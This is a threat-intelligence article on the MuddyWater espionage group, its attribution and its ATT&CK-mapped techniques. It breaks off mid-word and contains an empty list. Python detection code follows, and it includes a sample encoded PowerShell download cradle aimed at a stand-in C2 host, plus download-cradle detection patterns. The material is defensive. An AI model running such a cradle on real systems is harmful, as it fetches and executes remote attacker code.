MuddyWater is a cyber-espionage group widely believed to operate on behalf of Iran’s intelligence apparatus. Security researchers and government agencies assess that the group is linked to the Iranian Ministry of Intelligence and Security (MOIS) and functions as part of the country’s state-sponsored cyber operations. The group has been active since at least 2017 and has conducted campaigns against government agencies, telecommunications companies, energy providers, defense contractors, and other critical sectors around the world. Although MuddyWater’s operations originally focused on intelligence collection, the group has gradually expanded its toolkit and objectives. Recent campaigns suggest a shift toward more disruptive and hybrid operations that mix espionage, data theft, and destructive attacks. The 2025–2026 campaign, known as Operation Olalampo, illustrates this evolution. The operation targeted organisations across the Middle East and North Africa and introduced several new malware families and command-and-control techniques. To understand the significance of Olalampo, it is necessary to examine MuddyWater’s historical development, operational patterns, and technical methods as mapped in the MITRE ATT&CK framework.

Origins and Attribution

Threat intelligence firms first began tracking MuddyWater activity in 2017. Multiple vendors independently discovered similar attack campaigns and later connected them to a single actor cluster. Over time, the group received many different names depending on the organisation reporting it. These include Seedworm, Static Kitten, Mercury, Mango Sandstorm, and TEMP.Zagros. Despite the naming differences, most researchers now agree that these labels refer to the same threat actor. Evidence for this conclusion includes shared malware families, infrastructure reuse, and overlapping targeting patterns. Government cybersecurity advisories and industry research link MuddyWater to Iranian intelligence operations.

Analysts assess that the group operates under the Ministry of Intelligence and Security and supports the strategic objectives of the Iranian state. Unlike some cybercriminal groups that focus on financial gain, MuddyWater campaigns usually align with geopolitical priorities. Targets frequently include government ministries, energy companies, telecommunications providers, and organisations connected to regional conflicts. These characteristics place MuddyWater within the category of advanced persistent threats (APTs). APT groups differ from conventional cybercriminals in several ways. They are usually state-sponsored, operate over long time periods, and prioritize intelligence collection or strategic disruption over immediate financial profit.

Operational Goals and Targeting

MuddyWater campaigns commonly target organisations that provide strategic information or influence geopolitical events. These targets often include national governments, defence contractors, oil and gas companies, telecommunications firms, and infrastructure operators. Geographically, the group has focused heavily on the Middle East, but it has also targeted victims in Asia, Europe, Africa, and North America. The objectives of these campaigns typically include:

In many cases, MuddyWater operations appear to serve both espionage and strategic positioning. By gaining long-term access to networks in energy, telecommunications, or government systems, the group can collect intelligence while also maintaining the ability to conduct disruptive attacks later.

MITRE ATT&CK Perspective: Core Tradecraft

The MITRE ATT&CK framework is widely used to map threat actor techniques across the lifecycle of a cyberattack. MuddyWater campaigns follow a consistent attack pattern that fits many of the ATT&CK tactics and techniques.

Initial Access

One of the group’s most common entry methods is spear-phishing. Attackers send carefully crafted emails to targeted individuals with malicious attachments or links. These attachments are often Microsoft Office documents that contain macros or embedded scripts. When the victim opens the document, the script downloads the next stage of the attack. This behaviour corresponds to the MITRE ATT&CK technique Phishing (T1566) under the Initial Access tactic. In some cases, MuddyWater has also exploited vulnerabilities in public-facing servers. This allows the attackers to gain entry without relying on user interaction.

Execution

After gaining access, MuddyWater often uses scripting environments for code execution. PowerShell is a common tool in their operations. By running scripts directly in memory, attackers can avoid leaving obvious artefacts on disk. This technique maps to Command and Scripting Interpreter (T1059) in MITRE ATT&CK.

Persistence

Maintaining access is a key part of APT operations. MuddyWater often installs remote management tools or custom backdoors that allow them to reconnect later. Researchers have observed the group using legitimate remote administration tools to maintain persistence within compromised networks. Because these tools are normally used by system administrators, they can blend into normal network activity.

Defense Evasion

Defence evasion is another hallmark of MuddyWater activity. The group frequently obfuscates scripts and disguises malicious components as legitimate software. Examples include loaders that impersonate legitimate system files or hide malicious code inside trusted processes. This behaviour corresponds to techniques such as Obfuscated Files or Information (T1027) and Masquerading (T1036).

Command and Control

Once a system is compromised, MuddyWater establishes command-and-control channels to communicate with the infected machine. These channels allow attackers to issue commands, upload tools, or exfiltrate data. Historically, the group used standard web protocols or custom malware backdoors for command-and-control communication. More recent campaigns have experimented with alternative channels, including messaging platforms.

Malware and Tooling

Over the years, MuddyWater has used a wide range of malware families and tools. Some of these are custom-bui
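The Execution and Defense Evasion tradecraft described above (in-memory PowerShell under T1059, encoded scripts under T1027, and system-file impersonation under T1036) can be turned into endpoint detection logic. The following Python is an added example, not code from the original article or from any vendor: it assumes Sysmon-style process-creation events with Image and CommandLine fields, and the system-binary allow-list and the sample events are constructed for illustration.

```python
import base64
import re
from pathlib import PureWindowsPath

# ATT&CK techniques the article maps MuddyWater tradecraft to
T1059 = "T1059 Command and Scripting Interpreter"
T1027 = "T1027 Obfuscated Files or Information"
T1036 = "T1036 Masquerading"
# Assumed allow-list: these Windows binaries only run legitimately from system dirs
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "explorer.exe", "csrss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
# Strings typical of a PowerShell download cradle that stages code in memory
DOWNLOAD_CRADLE = re.compile(r"(iex|invoke-expression|downloadstring|net\.webclient)", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(event):
    """Map one process-creation event (Image, CommandLine) to ATT&CK technique IDs."""
    findings = []
    image = PureWindowsPath(event["Image"])
    name = image.name.lower()
    cmd = event["CommandLine"]
    if name in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:  # encoded payload: flag obfuscation, then inspect clear text
            findings.append(T1027)
            cmd = decoded
        if DOWNLOAD_CRADLE.search(cmd):
            findings.append(T1059)
    if name in SYSTEM_BINARIES and not str(image.parent).lower().startswith(SYSTEM_DIRS):
        findings.append(T1036)  # system binary name running from a non-system path
    return findings

# Constructed sample events (Sysmon-style fields), not real telemetry
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()},
    {"Image": r"C:\Users\Public\svchost.exe", "CommandLine": "svchost.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]
```

Running analyse_event over each entry in SAMPLE_EVENTS yields [T1027, T1059] for the encoded download cradle, [T1036] for the misplaced svchost.exe, and nothing for the legitimate service host.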